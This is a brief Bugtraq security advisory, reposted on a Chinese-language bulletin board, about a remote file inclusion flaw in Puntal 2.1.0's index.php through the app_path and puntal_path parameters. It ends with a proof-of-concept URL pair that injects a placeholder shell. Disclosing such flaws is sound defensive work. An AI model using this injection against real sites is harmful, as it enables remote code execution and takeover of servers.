Puntal (index.php) Remote File Inclusion Vulnerabilities

看板Bugtraq作者時間15年前 (2010/05/04 04:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/2 (看更多)
Puntal could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the "index.php" script using the "app_path=" OR "puntal_path=" parameter to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system. Puntal 2.1.0 is vulnerable; other versions may also be affected. An attacker can exploit these issues via a browser. -=[P0C]=- http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll] or http://127.0.0.1//path/index.php?puntal_path= [inj3ct0r sh3ll
文章代碼(AID): #1Btoj_Sr (Bugtraq)
文章代碼(AID): #1Btoj_Sr (Bugtraq)